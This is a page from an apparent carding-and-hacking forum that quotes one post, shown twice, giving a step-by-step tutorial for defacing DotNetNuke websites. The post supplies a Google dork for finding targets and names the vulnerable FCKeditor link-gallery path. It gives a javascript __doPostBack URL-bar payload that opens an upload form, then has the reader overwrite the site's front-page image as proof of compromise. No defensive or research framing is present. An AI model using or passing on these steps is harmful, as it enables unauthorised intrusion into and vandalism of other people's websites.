Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Hacking Tools
Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit
Message
<blockquote data-quote="Geniu" data-source="post: 349" data-attributes="member: 13"><p><strong>First Check whether the Website is vulnerable or not( if you don’t know how to do it,<a href="http://www.breakthesecurity.com/2010/12/how-to-find-vulnerable-website.html" target="_blank"> read this</a>)</strong></p><p><strong></strong></p><p><strong>Or simply copy this code to google and hit enter:</strong></p><p><strong></strong></p><p><strong>inurl:/portals/0</strong></p><p><strong></strong></p><p><strong>Open the home page and check any image which is located in /portals/0/</strong></p><p><strong>Check the location of the image. It should be located in /portals/0/</strong></p><p><strong></strong></p><p><strong>For e.g. in case of <a href="http://www.example.com/" target="_blank">http://www.example.com</a> ..the image is located at location- <a href="http://www.example.com/Portals/0/SHM.jpg" target="_blank">http://www.example.com/Portals/0/SHM.jpg</a></strong></p><p><strong></strong></p><p><strong>Yeah… it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.</strong></p><p><strong></strong></p><p><strong></strong></p><p><strong>Now here is the exploit</strong></p><p><strong></strong></p><p><strong>Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</strong></p><p><strong></strong></p><p><strong>HOW TO RUN ?</strong></p><p><strong></strong></p><p><strong>Simply copy paste it as shown below:</strong></p><p><strong></strong></p><p><strong><a href="https://www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" target="_blank">www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</a></strong></p><p><strong></strong></p><p><strong>You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)</strong></p><p><strong></strong></p><p><strong><a href="https://3.bp.blogspot.com/_1Rgvx77sTm4/TE7_2MHChII/AAAAAAAAElg/orqqIpYmZ2k/s400/1.JPG" target="_blank">http://3.bp.blogspot.com/_1Rgvx77sTm4/TE7_2MHChII/AAAAAAAAElg/orqqIpYmZ2k/s400/1.JPG</a></strong></p><p><strong>After selecting the third option, replace the URL bar with below script</strong></p><p><strong></strong></p><p><strong>javascript:__doPostBack(‘ctlURL$cmdUpload’,”)</strong></p><p><strong></strong></p><p><strong>After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh…THAT,S IT you have hacked the website.</strong></p></blockquote><p></p>
[QUOTE="Geniu, post: 349, member: 13"] [B]First Check whether the Website is vulnerable or not( if you don’t know how to do it,[URL='http://www.breakthesecurity.com/2010/12/how-to-find-vulnerable-website.html'] read this[/URL]) Or simply copy this code to google and hit enter: inurl:/portals/0 Open the home page and check any image which is located in /portals/0/ Check the location of the image. It should be located in /portals/0/ For e.g. in case of [URL='http://www.example.com/']http://www.example.com[/URL] ..the image is located at location- [URL]http://www.example.com/Portals/0/SHM.jpg[/URL] Yeah… it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system. Now here is the exploit Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx HOW TO RUN ? Simply copy paste it as shown below: [URL='https://www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx']www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx[/URL] You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site) [URL='https://3.bp.blogspot.com/_1Rgvx77sTm4/TE7_2MHChII/AAAAAAAAElg/orqqIpYmZ2k/s400/1.JPG']http://3.bp.blogspot.com/_1Rgvx77sTm4/TE7_2MHChII/AAAAAAAAElg/orqqIpYmZ2k/s400/1.JPG[/URL] After selecting the third option, replace the URL bar with below script javascript:__doPostBack(‘ctlURL$cmdUpload’,”) After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh…THAT,S IT you have hacked the website.[/B] [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Hacking Tools
Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit
Top